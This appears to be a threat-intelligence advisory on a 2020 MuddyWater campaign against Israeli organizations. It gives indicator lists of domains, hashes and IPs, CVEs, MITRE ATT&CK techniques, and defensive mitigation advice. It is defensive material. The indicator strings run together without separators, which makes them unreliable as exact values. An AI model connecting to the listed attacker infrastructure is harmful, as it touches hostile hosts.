
Operation Quicksand: MuddyWater's Attacks to Israeli Organizations
During September 2020, identified a new campaign targeting many prominent Israeli organizations was identified. The campaign was attributed to the Iranian threat actor ‘MuddyWater’ (also known as TEMP.Zagros, Static Kitten and Seedworm).
Indicators of Compromise
Domains (1215)
brucel.rublockpost.websitebitsbitsd.spaceadblocked.spaceautumnale.xyzbrontaga.rucalendas.ruaradewa.rubobotal.rubombinator.xyzadmin-gmail.onlinebetsuno.ruanisoptera.onlinecanadensis.websitebrevisi.ruartisola.ruburuncha.ruacaciana.xyzalibetar.ruanisoptera.ru+1195 moreHashes (2230)
6efdc5392d11ee5f4de7c1702faf89a0de891437a0ccee1f048d05ed3cc1d880747fbc85901d519c93cde42db42203dcc24aa5b09eb35f8313b9f98f89a14cdc625ed01fd1f2dc43b3c2492956fddc682aca3f793fac83e2d0dc7def10f68db0e5b00180324a73020f9b890c3ee620a318c537b62a7c37dcd051615f9983bcfbea17cdb1f24ce8e6679893049ce4e5a03bc2d8c7e44bf5b918bf8bf1c2e45c5de4d11e5696dce028459cf26be5816b14c6b1448456e716156d02c7e439d87318a79028df21966155675a407ba199561cf245e9e2858026bf7166a0f74a4b7bf4ae9d3307454ad504aff14bb089cb4089243e1a5ed325bdc225325dc4b8dcf3711e628d08854e97c49cfb904c0816129ed1d432c6bfff576b8c643aa43cbc53287ea515be67fa51be2bdb4132415003867fdd4eef299ca9de3d31fe4179ac61cf159dc3d987e6f1164a3da00ea80e45cc1fdc73d30cb0dff888e011b97d06e6752fb80c69ab7ecb6f2f3928c947bdd8d9e52a083856b9c644f240a6691e7b71065c142895a78d3c1bc2c321a2c41d8ae6ec402c2094ab5b2530c263a4b5c8c25b83d5e0ab0fa47bd9+2210 moreIPv4 (2537)
159.48.53.178194.67.108.168187.94.189.20147.182.169.247208.96.98.111118.249.53.26159.48.53.201178.46.94.132207.138.197.169185.191.215.7128.75.141.161123.240.37.7331.40.251.171178.184.187.100194.58.111.54168.100.10.129183.89.78.52193.243.156.212109.201.34.230116.48.6.22+2517 moreCVEs (10)
CVE-2020-1472CVE-2022-47633CVE-2017-0199CVE-2020-0688CVE-2018-13379CVE-2021-45608CVE-2021-45046CVE-2022-45359CVE-2017-0213CVE-2021-44228APT Groups
MuddyWater
Iran, Islamic Republic of
Notes
<div><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>MITRE ATT&CK Techniques Used by the MuddyWater APT Group</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><br></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Reconnaissance</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1589.002 Gather Victim Identity Information: Email Addresses</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><br></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Resource Development</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1583.006 Acquire Infrastructure: Web Services</font></li><li><font color="#0e101a">T1588.002 Obtain Capabilities: Tool</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><br></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Initial Access</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1566.001 Phishing: Spearphishing Attachment</font></li><li><font color="#0e101a">T1566.002 Phishing: Spearphishing Link</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><br></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Execution</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1047 Windows Management Instrumentation</font></li><li><font color="#0e101a">T1059.001 Command and Scripting Interpreter: PowerShell</font></li><li><font color="#0e101a">T1059.003 Command and Scripting Interpreter: Windows Command Shell</font></li><li><font color="#0e101a">T1059.005 Command and Scripting Interpreter: Visual Basic</font></li><li><font color="#0e101a">T1059.006 Command and Scripting Interpreter: Python</font></li><li><font color="#0e101a">T1059.007 Command and Scripting Interpreter: JavaScript</font></li><li><font color="#0e101a">T1203 Exploitation for Client Execution</font></li><li><font color="#0e101a">T1204.001 User Execution: Malicious Link</font></li><li><font color="#0e101a">T1204.002 User Execution: Malicious File</font></li><li><font color="#0e101a">T1559.001 Inter-Process Communication: Component Object Model</font></li><li><font color="#0e101a">T1559.002 Inter-Process Communication: Dynamic Data Exchange</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><br></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Persistence</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1053.005 Scheduled Task/Job: Scheduled Task</font></li><li><font color="#0e101a">T1137.001 Office Application Startup: Office Template Macros</font></li><li><font color="#0e101a">T1543.003 Create or Modify System Process: Windows Service</font></li><li><font color="#0e101a">T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</font></li><li><font color="#0e101a">T1547.005 Boot or Logon Autostart Execution: Security Support Provider</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><br></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Privilege Escalation</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1134 Access Token Manipulation</font></li><li><font color="#0e101a">T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control </font></li><li><font color="#0e101a">T1555 Credentials from Password Stores</font></li><li><font color="#0e101a">T1555.003 Credentials from Web Browsers</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><br></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Defense Evasion</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1027 Obfuscated Files or Information</font></li><li><font color="#0e101a">T1027.003 Steganography</font></li><li><font color="#0e101a">T1027.004 Compile After Delivery</font></li><li><font color="#0e101a">T1027.005 Obfuscated Files or Information: Indicator Removal from Tools</font></li><li><font color="#0e101a">T1036.005 Masquerading: Match Legitimate Name or Location</font></li><li><font color="#0e101a">T1055.001 Process Injection: Dynamic-link Library Injection</font></li><li><font color="#0e101a">T1055.002 Process Injection: Portable Executable Injection</font></li><li><font color="#0e101a">T1140 Deobfuscate/Decode Files or Information</font></li><li><font color="#0e101a">T1218.003 Signed Binary Proxy Execution: CMSTP</font></li><li><font color="#0e101a">T1218.005 Signed Binary Proxy Execution: Mshta</font></li><li><font color="#0e101a">T1218.011 Signed Binary Proxy Execution: Rundll32</font></li><li><font color="#0e101a">T1480 Execution Guardrails</font></li><li><font color="#0e101a">T1562.001 Impair Defenses: Disable or Modify Tools</font></li><li><font color="#0e101a">T1574.001 Hijack Execution Flow: DLL Search Order Hijacking</font></li><li><font color="#0e101a">T1574.002 Hijack Execution Flow: DLL Side-Loading</font></li><li><font color="#0e101a">T1574.007 Hijack Execution Flow: Path Interception by PATH Environment Variable</font></li><li><font color="#0e101a">T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking</font></li><li><font color="#0e101a">T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><br></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Credential Access</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1003.001 OS Credential Dumping: LSASS Memory</font></li><li><font color="#0e101a">T1003.004 OS Credential Dumping: LSA Secrets</font></li><li><font color="#0e101a">T1003.005 OS Credential Dumping: Cached Domain Credentials</font></li><li><font color="#0e101a">T1552.001 Unsecured Credentials: Credentials In Files</font></li><li><font color="#0e101a">T1552.002 Unsecured Credentials: Credentials in Registry</font></li><li><font color="#0e101a">T1552.006 Unsecured Credentials: Group Policy Preferences,</font></li><li><font color="#0e101a">T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><br></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Discovery</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1005 Data from Local System</font></li><li><font color="#0e101a">T1012 Query Registry</font></li><li><font color="#0e101a">T1016 System Network Configuration Discovery</font></li><li><font color="#0e101a">T1033 System Owner/User Discovery</font></li><li><font color="#0e101a">T1049 System Network Connections Discovery</font></li><li><font color="#0e101a">T1057 Process Discovery</font></li><li><font color="#0e101a">T1082 System Information Discovery</font></li><li><font color="#0e101a">T1083 File and Directory Discovery</font></li><li><font color="#0e101a">T1087.002 Account Discovery: Domain Account</font></li><li><font color="#0e101a">T1482 Domain Trust Discovery</font></li><li><font color="#0e101a">T1518 Software Discovery</font></li><li><font color="#0e101a">T1518.001 Security Software Discovery</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><br></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Collection</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1056.001 Input Capture: Keylogging</font></li><li><font color="#0e101a">T1113 Screen Capture</font></li><li><font color="#0e101a">T1123 Audio Capture</font></li><li><font color="#0e101a">T1560.001 Archive Collected Data: Archive via Utility</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><br></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Command and Control</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1071.001 Application Layer Protocol: Web Protocols</font></li><li><font color="#0e101a">T1090.002 Proxy: External Proxy</font></li><li><font color="#0e101a">T1102.002 Web Service: Bidirectional Communication</font></li><li><font color="#0e101a">T1104 Multi-Stage Channels</font></li><li><font color="#0e101a">T1105 Ingress Tool Transfer</font></li><li><font color="#0e101a">T1132.001 Data Encoding: Standard Encoding</font></li><li><font color="#0e101a">T1132.002 Data Encoding: Non-Standard Encoding</font></li><li><font color="#0e101a">T1219 Remote Access Software</font></li><li><font color="#0e101a">T1572 Protocol Tunneling</font></li></ul><p></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><br></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b>Exfiltration</b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"><font color="#0e101a"><b><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;"></span></b></font></p><p style="margin-top: 0pt; margin-bottom: 0pt; background: transparent;"></p><ul><li><font color="#0e101a">T1041 Exfiltration Over C2 Channely</font></li></ul><div><font color="#0e101a"><br></font></div><p></p></div><div><b>Security Recommendations Against MuddyWater </b></div><div><ul><li>MuddyWater leverages spear phishing. Provide necessary training to your employees for security awareness. </li><li>Gain visibility into external-facing digital assets with an Attack Surface Management solution. </li><li>Regularly apply security patches and software updates. </li><li>Apply the least privilege principle across the network, especially to critical systems and services </li><li>Secure domain controllers (DC) using best practices. </li><li>Enable multifactor authentication (MFA) to prevent lateral movement. </li><li>Refer to IOCs and take necessary actions toward mitigation. </li></ul></div>
Mitigation
<p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Up-to-date backups are the most effective way of recovering from a ransomware attack; you should do the following, as N.C.S.C. suggests.</span></p><ul style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Make regular backups of your most important files, which will be different for every organization, and check that you know how to restore files from the backup, and regularly test that it is working as expected.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Ensure you create offline backups that are kept separate, in a different location (ideally offsite), from your network and systems, or in a cloud service designed for this purpose, as ransomware actively targets backups to increase the likelihood of payment. Our blog on 'Offline backups in an online world' provides additional advice for organizations.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Make multiple copies of files using different backup solutions and storage locations. It would be best if you didn't rely on having two copies on a single removable drive, nor should you rely on multiple documents in a single cloud service.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Ensure that your backup devices (such as external hard drives and USB sticks) are not permanently connected to your network. Attackers will target connected backup devices and solutions to make recovery more complex.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">You should ensure that your cloud service protects previous backup versions from being immediately deleted and allows you to restore them. This will prevent your live and backup data from becoming inaccessible - cloud services often automatically synchronize directly after your files have been replaced with encrypted copies.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Ensure that backups are only connected to known clean devices before starting recovery.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Scan backups for malware before you restore files. Ransomware may have infiltrated your network over time and replicated to backups before being discovered.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Regularly patch products used for backup so attackers cannot exploit any known vulnerabilities they might contain.</span></li></ul><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><br></p><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">You can reduce the likelihood of malicious content reaching your devices through a combination of the following:</span></p><ul style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">filtering to only allow file types you would expect to receive</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">blocking websites that are known to be malicious</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">actively inspecting the content</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">using signatures to block known malicious code</span></li></ul><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><br></p><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Prevent malware from spreading across organization action by following N.C.S.C. guidance to prevent lateral movement. You should also:</span></p><ul style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Use M.F.A. to authenticate users so that if malware steals credentials, they can't easily be reused.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Ensure obsolete platforms (Operating Systems (O.S.) and apps) are appropriately segregated from the rest of the network - refer to N.C.S.C. guidance on Obsolete Platforms for further details</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Regularly review and remove user permissions that are no longer required to limit the malware's ability to spread.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Ensure system administrators avoid using their accounts for email and web browsing (to prevent malware from being able to run with their high level of system privilege)</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Practice good asset management, including keeping track of which versions of the software are installed on your devices so that you can target security updates quickly</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Keep devices and infrastructure patched, especially security-enforcing devices on the network boundary (such as firewalls and VPN products)</span></li></ul><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><br></p><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">A 'defense in depth' approach assumes that malware will reach your devices. You should therefore take steps to prevent malware from running. The measures required will vary for each device type, O.S., and version, but you should generally use device-level security features. Organizations should:</span></p><ul style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Centrally manage devices to only permit applications trusted by the enterprise to run on machines, using technologies including AppLocker, or from trusted app stores (or other trusted locations)</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Consider whether enterprise antivirus or anti-malware products are necessary, and keep the software (and its definition files) up to date.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Provide security education and awareness training to your people, for example, N.C.S.C.'s Top Tips for Staff.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Disable or constrain scripting environments and macros by:</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Enforcing PowerShell Constrained Language mode via a User Mode Code Integrity</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Protecting your systems from malicious Microsoft Office macros</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Disable autorun for mounted media (prevent the use of removable media if it is not needed)</span></li></ul><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><br></p><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">In addition, attackers can force their code to execute by exploiting vulnerabilities in the device. Prevent this by keeping devices well-configured and up-to-date. We recommend that you:</span></p><ul style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Install security updates as soon as they become available to fix exploitable bugs in your products</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Enable automatic updates for O.S.s, applications, and firmware if you can</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Use the latest versions of O.S.s and applications to take advantage of the latest security features</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Configure host-based and network firewalls, disallowing inbound connections by default</span></li></ul><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><br></p><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Malware attacks, particularly ransomware attacks, can be devastating for organizations because computer systems are no longer available, and in some cases, data may never be recovered. It can take several weeks to recover if recovery is possible, but your corporate reputation and brand value could take much longer. The following will help to ensure your organization can recover quickly.</span></p><ul style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Identify your critical assets and determine their impact if they were affected by a malware attack.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Plan for an attack, even if you think it is unlikely. Many examples of organizations have been impacted by collateral malware, even though they were not the intended target.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Develop an internal and external communication strategy. The correct information must reach the right stakeholders in a timely fashion.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Determine how you will respond to the ransom demand and the threat of your organization's data being published.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Ensure that incident management playbooks and supporting resources such as checklists and contact details are available if you cannot access your computer systems.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Identify your legal obligations regarding reporting incidents to regulators, and understand how to approach this.</span></li><li style="background: transparent; margin-top: 0pt; margin-bottom: 0pt; list-style-type: disc;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">Exercise your incident mangement plan. This helps clarify the roles and responsibilities of staff and third parties and to prioritize system recovery.</span></li></ul><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;">After an incident, revise your incident management plan to include lessons learned to ensure that the same event cannot occur in the same way again.</span></p><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;"><br></span></p><p style="color: rgb(14, 16, 26); background: transparent; margin-top:0pt; margin-bottom:0pt;"><span style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;"><br></span></p><p style="background: transparent; margin-top: 0pt; margin-bottom: 0pt;"><br></p>